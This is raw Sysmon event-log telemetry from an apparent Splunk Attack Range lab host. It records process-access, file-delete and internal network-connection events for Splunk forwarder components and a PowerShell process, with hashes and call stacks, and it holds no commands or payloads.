13:12:24.143{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.142{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-9FB8-6140-5B56-04000000C801}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.142{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FB8-6140-5B56-04000000C801}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.124{B81B27B7-9FB8-6140-5B56-04000000C801}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036496513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:55.057{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50416-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:25.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6106160214EE8A36EA2F6EC304868290,SHA256=34B0D1001B48F279AA1BD2341C4C46FBC9E9BA1DD5C08B40AD464F753AACBB63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:25.125{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=591766723EBC211F8C6655F95E970B1A,SHA256=347CF4B3523E2C364B0638F71D09D902CEA5FBF8B6EA9DBC5E5B20939DA7CDBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:25.125{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF836E7288743012DA2BA0413D92883C,SHA256=EA745DA8952B3F6DE445E250791E100ED8BBA3095AD20986FF14E17A32C7A2A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:55.918{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50417-false10.0.1.12-8000- 23542300x800000000000000036496514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:26.793{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=749E6BA284B7B5313BE1A34C59FF57BC,SHA256=D0CE1D49AA021859DB15F5532054E899A4BAE745C861695509DC0D95E91ACA49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:27.823{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79A6B1AA48FE3A2F04EAB834CAC6575D,SHA256=BCBA7DB910B55FF3617F3690E784C1B9030A70CAC353BFCA9A7D4EC28E1CC519,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:59.072{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50418-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:28.841{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61152B2421B2C4FCE810879C53E9F826,SHA256=1512AB2DAA6CB5D72E86731415EE332C381D3D7051A327BB20F2C0E98C45CC84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:28.441{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=86E15DA80BABDAC41283AC2A1F3BA96A,SHA256=5B72FA76A3FFC8C922FC59D4344CA6CA394B32EEEE8A9FEC076BBFB83DB31EE7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:29.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F339181BDFDA1172C785E4FC515874AF,SHA256=DAC3DEA52C4F4139D9D1820B3A5E28A7F5F0AE3D00058D01DC004D2F1781C5EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:30.904{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3201EF6942CF1E7CB67A9CB3B795436,SHA256=91FFF1003CFA707887E7DC60AA674C6D9D4CE283E8BE41A29D0C26390B3DCA44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:31.904{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B7022B6A7424B160EECE94856891120,SHA256=CE20A1839C23F3BDA4ECCA6BFCF1BE2944ECF161C712F8BDB8CDC4377650798D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:32.919{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=649E68570347B45F58D2B89287F209F4,SHA256=74644E924C8B5CB63CC86C6D91A6436E6D354B7A5CFB37823B03622A11355412,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:01.915{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50419-false10.0.1.12-8000- 23542300x800000000000000036496523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:32.420{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:33.937{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C67DC0DA78DE45D7A422D909B39569D5,SHA256=F09DB41B7ED93A057AEF4C23502AA62775CD6AC8590FBC5D702CAEF9DD685478,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:04.084{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50420-false10.0.1.12-8089- 23542300x800000000000000036496529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:34.956{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3511B86BF9F5C0E04CC9C044EA97CFCB,SHA256=A0921B35C126D5FF34B41F6EF8D7CCBAF028158CE6B5FF8FD8857D18925C67A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:34.439{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EB8AE4E226AD65D76BFAADFEA1AFF25F,SHA256=C1088A1532A2C6F0DD6A90C5205412748609CBB0AF309C6351DE213100C274C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:35.971{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B4A0847F2C582BF3ED4211BF47547FD,SHA256=5FD150925D2B2B3BB1624F3346FCBF83DDCF6C2D13E8DE11651108CFC0A83224,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:05.084{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50421-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036496540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.884{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FC5-6140-5D56-04000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.884{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.884{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.884{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.884{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.884{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9FC5-6140-5D56-04000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.884{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FC5-6140-5D56-04000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.870{B81B27B7-9FC5-6140-5D56-04000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.001{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50F6228348177D0088597956D6AFA1B4,SHA256=6AD4065DC6A32A5FFE0B75C1384A4E2E53D1A9F3C99716A8DC763C160FFAD4C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.885{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1043BBAF824389D1F3219878E9B19B10,SHA256=3A477122D73B91CB4E5726AA06333961D22976F068C391629E630D096DC3E666,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.885{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=591766723EBC211F8C6655F95E970B1A,SHA256=347CF4B3523E2C364B0638F71D09D902CEA5FBF8B6EA9DBC5E5B20939DA7CDBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.738{B81B27B7-9FC6-6140-5E56-04000000C801}67407116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.570{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FC6-6140-5E56-04000000C801}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.570{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 